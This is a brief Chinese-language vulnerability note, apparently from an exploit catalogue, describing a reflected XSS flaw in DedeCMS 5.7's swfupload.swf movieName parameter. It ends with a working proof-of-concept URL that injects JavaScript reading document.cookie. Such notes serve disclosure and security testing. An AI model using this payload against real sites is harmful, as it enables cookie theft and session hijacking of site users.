Dedecms swf文件反射型xss¶
漏洞简介¶
DedeCMS 5.7 /images/swfupload/swfupload.swf文件movieName参数没有合适过滤,导致跨站脚本漏洞。
漏洞影响版本¶
DedeCMS 5.7
文件位置¶
漏洞文件为:http://127.0.0.1/images/swfupload/swfupload.swf
漏洞POC¶
http://127.0.0.1/images/swfupload/swfupload.swf?movieName="])}catch(e){if(!window.x){window.x=1;alert(document.cookie)}}//